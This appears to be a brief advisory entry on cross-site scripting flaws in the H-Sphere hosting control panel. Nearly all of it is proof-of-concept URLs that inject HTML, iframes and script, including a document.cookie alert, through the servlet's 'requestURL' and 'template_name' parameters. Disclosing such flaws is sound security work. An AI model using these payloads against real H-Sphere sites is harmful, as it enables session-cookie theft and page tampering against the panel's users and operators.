|
H-Sphere HTML Template Inclusion Cross-Site Scripting Vulnerabilities
The following examples were provided: http://www.example.com/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP?action=login&ftemplate=[MORE CODE AND XSS]&requestURL="><h1>XSS%20in%20PSOFT%20SPHERE<a%20href="&login=[USERNAME]& password=[PASSWORD] http://www.example.com/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template _name=<H1>xss</H1> http://www.example.com/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template _name=<IFRAME> http://www.example.com/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template _name=<h1>XSS http://www.example.com/[PATH TO H-SPHERE]/servlet/psoft.hsphere.CP/[USERNAME]/[ID]/psoft.hsphere.CP?template _name=<script>alert(document.cookie);</script> |
|
|
Privacy Statement |